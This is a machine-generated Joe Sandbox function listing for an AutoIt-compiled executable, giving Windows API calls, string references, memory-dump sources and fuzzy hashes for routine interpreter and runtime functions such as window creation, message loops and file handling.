Opcode Fuzzy Hash: 9b7a50a9ef1e3f2f775bcfe6b87ff958fb9b61b0f01cbbe429c2139bfaab98e1
Instruction Fuzzy Hash: A37192B09112008FCB88DF7BACA56D53BE6FB98314340C12ED219E73A1EB714469CF66

Function 00D790C5 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bac3304316350dc5f933a33d395a357a0696f9548d786a6cc1ba3ecbee6a918
Instruction ID: 3b1d4d6ed6831f5f2fb73bca2ce23755c03f7defb5ece3ad39ec83cbf9aa89d1
Opcode Fuzzy Hash: 8bac3304316350dc5f933a33d395a357a0696f9548d786a6cc1ba3ecbee6a918
Instruction Fuzzy Hash: F3C1D472A043499FDF11DFE9D851BADFBB0AF09310F188199E958A7392E7309942CB71

Function 00D435B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D435E1
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D43602
ShowWindow.USER32(00000000,?,?,?,?,?,?,00D43368,?), ref: 00D43616
ShowWindow.USER32(00000000,?,?,?,?,?,?,00D43368,?), ref: 00D4361F

Strings

AutoIt v3, xrefs: 00D435D9, 00D435DE, 00D435DF
edit, xrefs: 00D435FC

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 878a7d1480457052644bfc25bbc4df058af16cc91c10363ccefdde636a6032ef
Instruction ID: e7919d960b8541a149f3278d8d7aa7db43e7c975e78c106607f093a484fc37aa
Opcode Fuzzy Hash: 878a7d1480457052644bfc25bbc4df058af16cc91c10363ccefdde636a6032ef
Instruction Fuzzy Hash: 5BF0D0716402967EEB315B176C08E7B3F7ED7C6F50B00801EBA14A7260D56518A9DA70

Function 00D461A9 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 122
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00D85287

Part of subcall function 00D48577: _wcslen.LIBCMT ref: 00D4858A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D46299

Strings

Line %d: , xrefs: 00D85305
AutoIt - , xrefs: 00D4620D
\+, xrefs: 00D85295

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line %d: $AutoIt - $\+
API String ID: 2289894680-1638154863
Opcode ID: b92b1a7e80d60d73989bf433472710de605a81ca160d731c2333c5acecc0bde3
Instruction ID: 9520db4e1c8bb92724d1d61b9bfde530dc3f958a9ef987a6520b7afb43110006
Opcode Fuzzy Hash: b92b1a7e80d60d73989bf433472710de605a81ca160d731c2333c5acecc0bde3
Instruction Fuzzy Hash: B4418E71408305AFCB11EB60EC81ADF77A8EF55320F04462EF599921A1EB70D649C7B7

Function 00D458CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00D458BE,SwapMouseButtons,00000004,?), ref: 00D458EF
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00D458BE,SwapMouseButtons,00000004,?), ref: 00D45910
RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00D458BE,SwapMouseButtons,00000004,?), ref: 00D45932

Strings

Control Panel\Mouse, xrefs: 00D458ED

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: d756a4ac688a0c8977861ebd51f784ef9ed689fd042ed2f88e30da78cf8dac08
Instruction ID: e2eae6723d5b2ba145d1962ece05d618dfa5c46c68ca37016a2d59e8aa22b03d
Opcode Fuzzy Hash: d756a4ac688a0c8977861ebd51f784ef9ed689fd042ed2f88e30da78cf8dac08
Instruction Fuzzy Hash: F4117975611618FFDF218F64EC80EAEBBB9EF45760F14842AF801E7214E2319E419B70

Function 00D4F238 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29windowsleepCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 00D4F27B
DispatchMessageW.USER32(?), ref: 00D4F289
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D4F29F
Sleep.KERNEL32(0000000A), ref: 00D4F2B1
TranslateAcceleratorW.USER32(?,?,?), ref: 00D932D8

Strings

(, xrefs: 00D4F264

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchPeekSleep
String ID: (
API String ID: 3288985973-2063206799
Opcode ID: c812d4907d4dc52d8c75cd9c0ffecb90f2deff902e1688724431b54bcc460a80
Instruction ID: 4b6d0df784faac66b94c7785497900cd2844e87bf62b4cbf03462a15a58bee6a
Opcode Fuzzy Hash: c812d4907d4dc52d8c75cd9c0ffecb90f2deff902e1688724431b54bcc460a80
Instruction Fuzzy Hash: 61F05E30605344ABEB348BA0DC89FDA73ADEB85300F144929E64AD70D0DB70A5888B3A

Function 00D43A95 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00D8413B

Part of subcall function 00D45851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D455D1,?,?,00D84B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00D45871

Part of subcall function 00D43A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00D43A76

Strings

`u, xrefs: 00D84134
X, xrefs: 00D84109

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`u
API String ID: 779396738-2693526198
Opcode ID: 386b4b999fd9b7a1653ffde1a72f7fc6fe6649a0f305408bdf7da80dc78e6382
Instruction ID: b3b8c8c55b468e0abf740f82f9dbfc18842d578604362ea209da1cbf1e3752f1
Opcode Fuzzy Hash: 386b4b999fd9b7a1653ffde1a72f7fc6fe6649a0f305408bdf7da80dc78e6382
Instruction Fuzzy Hash: AC218E71A042589BCB01DF98CC06BEE7BF9EF49314F008019E545B7281DBB49A898FB1

Function 00D6014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00D609D8

Part of subcall function 00D63614: RaiseException.KERNEL32(?,?,?,00D609FA,?,00000000,?,?,?,?,?,?,00D609FA,00000000,00E09758,00000000), ref: 00D63674

__CxxThrowException@8.LIBVCRUNTIME ref: 00D609F5

Strings

Unknown exception, xrefs: 00D60A02

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: b61843afccf1b55bbddf73674ea4a92d55efed2d66ddb087baa2107e0b12e4ea
Instruction ID: 4be86d198b29b9435f90556a2697ae72f4795b21aac7d7042487681340a28bd9
Opcode Fuzzy Hash: b61843afccf1b55bbddf73674ea4a92d55efed2d66ddb087baa2107e0b12e4ea
Instruction Fuzzy Hash: 2BF0A43490030CB7CB00BAA8DC4689B7B6C9A01354B584122B914D65D3FB70E655CAF0

Function 00DC89B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00DC8D52
TerminateProcess.KERNEL32(00000000), ref: 00DC8D59
FreeLibrary.KERNEL32(?,?,?,?), ref: 00DC8F3A

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 149ee3ade34288ac070f0a2d4d7521ba64607c68b60d310b12d9252d642b6eee
Instruction ID: 152c7908128c30266f5808920a5a8f584299fc9bdcfbe48189e6ad0b2d1b5fb3
Opcode Fuzzy Hash: 149ee3ade34288ac070f0a2d4d7521ba64607c68b60d310b12d9252d642b6eee
Instruction Fuzzy Hash: D8125971A083419FC714DF28C484F6ABBE5FF89314F18895DE8898B252CB31E945CBA2

Function 00DC9AF3 Relevance: 4.7, APIs: 3, Instructions: 233COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DC9B87
_strcat.LIBCMT ref: 00DC9BC6
_wcslen.LIBCMT ref: 00DC9C14

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: _wcslen$_strcat
String ID:
API String ID: 306214811-0
Opcode ID: 2955eaa2faf42c9fc74aa1620aabddaed29b46511bb15b3229747908c138b639
Instruction ID: 9cd8f6116cda422172bb8de5ce730b40c548bb24fc9d704c4dbf8e84065ce8ad
Opcode Fuzzy Hash: 2955eaa2faf42c9fc74aa1620aabddaed29b46511bb15b3229747908c138b639
Instruction Fuzzy Hash: 77A14C31600606EFCB18DF18D5D5A69BBA1FF45314B2484ADF84A8F692DB31ED46CFA0

Function 00D5FCAD Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D461A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D46299

KillTimer.USER32(?,00000001,?,?), ref: 00D5FD36
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D5FD45
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00D9FE33

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: 5d4868d453d39ade444ef584a3cc09c44caeeb7cd56efa0106a9317449f9fda0
Instruction ID: 8a6ad4c617bc334329e0aaf7ec5313f7e2989252cdc326d62f5a67a4508b7d1d
Opcode Fuzzy Hash: 5d4868d453d39ade444ef584a3cc09c44caeeb7cd56efa0106a9317449f9fda0
Instruction Fuzzy Hash: 38317571905744AFEF32CF24C855BE6BBEC9B02308F0444AEE6DA97242D7745A85CB61

Function 00D78A2E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,?,?,00D7894C,?,00E09CE8,0000000C), ref: 00D78A84
GetLastError.KERNEL32(?,00D7894C,?,00E09CE8,0000000C), ref: 00D78A8E
__dosmaperr.LIBCMT ref: 00D78AB9

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: aa2f1232e7bda9d34da6c9ecfe96a6b8e60c4e11c193f0426727d05393949373
Instruction ID: 571f83b565a7808ddfd542bd7f020fc59e35ad018a9e7376c4f2ca97b84a6695
Opcode Fuzzy Hash: aa2f1232e7bda9d34da6c9ecfe96a6b8e60c4e11c193f0426727d05393949373
Instruction Fuzzy Hash: 95012B326466A05AC7246274BC4E77E67458B82734F3D815BF91C9F1D2FF708D8161B1

Function 00D7970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00D797BA,FF8BC369,00000000,00000002,00000000), ref: 00D79744
GetLastError.KERNEL32(?,00D797BA,FF8BC369,00000000,00000002,00000000,?,00D75ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00D66F41), ref: 00D7974E
__dosmaperr.LIBCMT ref: 00D79755

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 33542cd2dd62c7bc7467abc9809601e55933f9eacd71af997d2e4ebd785cb608
Instruction ID: e36cc06c72f146fce398ebc59ac438a6a16edf1826d37738ffc6f16dcc05a21c
Opcode Fuzzy Hash: 33542cd2dd62c7bc7467abc9809601e55933f9eacd71af997d2e4ebd785cb608
Instruction Fuzzy Hash: D5014C33620614AFCF099F99EC05CAE7B2ADB85330B384249F815DB290FA70DD418BB0

Function 00D52B20 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00D53006

Strings

CALL, xrefs: 00D52FD6

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 3b85b267242b2a5920d39f8f73ac930a4bedbb15675c2bc960993dacb761e000
Instruction ID: 3682e1411501f5e402789264a73865c62371ac8b695803a85964b103d7075f7f
Opcode Fuzzy Hash: 3b85b267242b2a5920d39f8f73ac930a4bedbb15675c2bc960993dacb761e000
Instruction Fuzzy Hash: 392279706083019FCB14DF24C881A2ABBF1FF95315F18895DF8969B3A1D771E949CBA2

Function 00D5FFE0 Relevance: 3.1, APIs: 2, Instructions: 94processCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00D6007D
CreateToolhelp32Snapshot.KERNEL32 ref: 00D6008F

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: CloseCreateHandleSnapshotToolhelp32
String ID:
API String ID: 3280610774-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: db5c47ec228d82b0d14b235e807864c33ead47ab4b1d063d72b3d62b1c42e414
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 4B31C271A00105DFD718DF58D490A6AFBB6FF59300B2886A5E44ACB656D732EDC1CBE0

Function 00D4396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D43A3C

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 62c93c0cac8e65f399cbdb31ac9687ad2c9827556f829665f0acf85886ada02e
Instruction ID: 4a8fb8bde67b6819ab40723e54a0a34d6d2396a168258ac940f5e25a80ea3f39
Opcode Fuzzy Hash: 62c93c0cac8e65f399cbdb31ac9687ad2c9827556f829665f0acf85886ada02e
Instruction Fuzzy Hash: F331A2B06047019FD720DF29D885797BBE8FB49308F00092EF6DA97241E775AA58CF62

Function 00D4331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00D4333D

Part of subcall function 00D432E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00D432FB
Part of subcall function 00D432E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00D43312

Part of subcall function 00D4338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00D43368,?), ref: 00D433BB
Part of subcall function 00D4338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00D43368,?), ref: 00D433CE
Part of subcall function 00D4338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00E12418,00E12400,?,?,?,?,?,?,00D43368,?), ref: 00D4343A
Part of subcall function 00D4338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00E12418,?,?,?,?,?,?,?,00D43368,?), ref: 00D434BB

SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00D43377

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
String ID:
API String ID: 1550534281-0
Opcode ID: 77fc9ce5f23564cf72eded59c0b0784287f36e2bac9f5335d698a863dac9ba80
Instruction ID: 494f84d6e9de07653b3392261ae2ea410416bf1716d97fe85ac191bad2ce56e0
Opcode Fuzzy Hash: 77fc9ce5f23564cf72eded59c0b0784287f36e2bac9f5335d698a863dac9ba80
Instruction Fuzzy Hash: E1F05E71554345AFE700AFB5FC0FBA47794E704B09F04881AB659A61E2CBBA81688B74

Function 00D4CAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00D4CEEE

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: e75e309789adc0284477899464093e301d4025bc1b5966e2c43988048d2e9c14
Instruction ID: 8426a2f726b01a5547c489eb7eeb9079181a7e0496bceb70e5b9ba0a6f0d66dd
Opcode Fuzzy Hash: e75e309789adc0284477899464093e301d4025bc1b5966e2c43988048d2e9c14
Instruction Fuzzy Hash: 4132C079A01206DFCF24CF64C884ABABBB5FF44354F198069E956AB251C734EE45CBB0

Function 00DC7AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
